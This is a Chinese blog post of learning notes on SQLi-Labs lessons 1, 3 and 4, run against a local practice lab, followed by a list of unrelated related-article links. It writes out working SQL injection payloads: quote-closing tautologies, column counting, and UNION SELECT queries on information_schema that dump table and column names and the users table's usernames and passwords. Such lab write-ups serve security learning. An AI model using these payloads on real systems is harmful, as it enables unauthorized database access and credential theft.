0x01.less1

id=1/ id=1 and 1=1结果正常

id=1 and 1=2结果正常,不合理

id=1'提示:

分析:

use near '   '   1'   ' LIMIT 0,1    '

所以正确sql语句 为:

select username,password from table where id='input'

所以:

id = 1' and '1'='1

结果正确

即:

select username,password from table where id='1' and '1'='1'

或者:

id = 1' and 1=1 --+

结果正确

即:

select username,password from table where id='1' and 1=1 --+'

0x02.less03

输入:

http://127.0.0.1/Sqli-Labs/Less-3/?id=1 and 1=2

得到:

所以存在sql注入漏洞

于是输入:

id=1'得到提示:

near '      '     1'     ') LIMIT 0,1      ' at line 1

所以 猜测sql语句为:

select username,password from table where id = ('input')

所以注入语句可以是:

id=1') and  ('1'='1

即:select username,password from table where id = ('1') and  ('1'='1')

注入成功

或者:

id=1') and 1=1 --+

即:select username,password from table where id = ('1') and 1=1 --+')

注入成功

0x04.less4

注入语句:

http://127.0.0.1/Sqli-Labs/Less-4/?id=1") and 1=2 --+

或者:

http://127.0.0.1/Sqli-Labs/Less-4/?id=(1" and "1=2

测试:

http://127.0.0.1/Sqli-Labs/Less-4/
?id=1") order by 3 --+
字段为3

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,2,3 --+

可以利用的字段为2,3

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,table_name,3 from information_schema.tables where table_schema='secu
rity' --+

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,table_name,3 from information_schema.tables where table_schema='secu
rity' limit 3,1 --+

第4个表名:

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='secu
rity' --+

4 个表名全部显示 :

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

显示列名:

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,group_concat(username,password),3 from users --+

显示users表里所有的用户名和密码:

sqli-labs less1 &&less3&&less4学习心得的更多相关文章

  1. Sqli labs系列-less-3 。。。

    原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...

  2. Sqli labs系列-less-1 详细篇

    要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...

  3. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  4. 我的MYSQL学习心得(一) 简单语法

    我的MYSQL学习心得(一) 简单语法 我的MYSQL学习心得(二) 数据类型宽度 我的MYSQL学习心得(三) 查看字段长度 我的MYSQL学习心得(四) 数据类型 我的MYSQL学习心得(五) 运 ...

  5. 我的MYSQL学习心得(二) 数据类型宽度

    我的MYSQL学习心得(二) 数据类型宽度 我的MYSQL学习心得(一) 简单语法 我的MYSQL学习心得(三) 查看字段长度 我的MYSQL学习心得(四) 数据类型 我的MYSQL学习心得(五) 运 ...

  6. 我的MYSQL学习心得(三) 查看字段长度

    我的MYSQL学习心得(三) 查看字段长度 我的MYSQL学习心得(一) 简单语法 我的MYSQL学习心得(二) 数据类型宽度 我的MYSQL学习心得(四) 数据类型 我的MYSQL学习心得(五) 运 ...

  7. 我的MYSQL学习心得(四) 数据类型

    我的MYSQL学习心得(四) 数据类型 我的MYSQL学习心得(一) 简单语法 我的MYSQL学习心得(二) 数据类型宽度 我的MYSQL学习心得(三) 查看字段长度 我的MYSQL学习心得(五) 运 ...

  8. 我的MYSQL学习心得(五) 运算符

    我的MYSQL学习心得(五) 运算符 我的MYSQL学习心得(一) 简单语法 我的MYSQL学习心得(二) 数据类型宽度 我的MYSQL学习心得(三) 查看字段长度 我的MYSQL学习心得(四) 数据 ...

  9. 我的MYSQL学习心得(六) 函数

    我的MYSQL学习心得(六) 函数 我的MYSQL学习心得(一) 简单语法 我的MYSQL学习心得(二) 数据类型宽度 我的MYSQL学习心得(三) 查看字段长度 我的MYSQL学习心得(四) 数据类 ...

随机推荐

  1. 练习三十:Python回文数判断编程练习。

    说到回文数,大家可能会比较的陌生,但是在我们的日常生活中常会遇到这样的数字,只是你不知道它是回文数罢了. 例如:12321,这组数字就是回文数. 设n是一任意自然数.若将n的各位数字反向排列所得自然数 ...

  2. NET Core 事件总线

    NET Core 事件总线,分布式事务解决方案:CAP 背景 相信前面几篇关于微服务的文章也介绍了那么多了,在构建微服务的过程中确实需要这么一个东西,即便不是在构建微服务,那么在构建分布式应用的过程中 ...

  3. JSON.stringify 语法讲解

    作用:这个函数的作用主要是为了系列化对象的. 可能有些人对系列化这个词过敏,我的理解很简单.就是说把原来是对象的类型转换成字符串类型(或者更确切的说是json类型的).就这么简单.打个比方说,你有一个 ...

  4. css文字与文本相关样式

    css文字属性定义文本的字体系列,大小,加粗,风格和变形   font-family          设置字体系列 font-size          设置字体的尺寸 font-style     ...

  5. 关于死循环while(true){}或for(;;){}的总结

    关于死循环while(true){}或for(;;){}的总结 1.基本用法: while(true){     语句体; } for(;;){     语句体; } 以上情况,语句体会一直执行. 2 ...

  6. Ubuntu11.04 安装cuda4.3

    一.卸载官方驱动并安装显卡驱动 1. sudo gedit /etc/modprobe.d/blacklist.conf,在文件末尾加上如下五行,然后保存 blacklist vga16fb blac ...

  7. javascript简单计算器实践

    参考部分资料,编写一个简单的计算器案例,虽然完成了正常需求,但是也有不满之处,待后续实力提升后再来补充,先把不足之处列出: 1:本来打算只要打开页面,计算器的输入框会显示一个默认为0的状态,但是在输入 ...

  8. iPad开发简单介绍

    iPad开发最大的不同在于iPhone的就是屏幕控件的适配,以及横竖屏的旋转. Storyboard中得SizeClass的横竖屏配置,也不支持iPad开发. 1.在控制器中得到设备的旋转方向 在 i ...

  9. 【Python图像特征的音乐序列生成】关于mingus一个bug的修复,兼改进情感模型

    mingus在输出midi文件的时候,使用这样的函数: from mingus.containers import NoteContainer from mingus.midi import midi ...

  10. UWP开发:自动生成迷宫&自动寻路算法(1)

    (1)前端篇 首先,我们创建一个新的Universal Windows Platform程序.这些小方块是通过GridView来罗列的,这样可以避免MainPaga.xaml的<Rectangl ...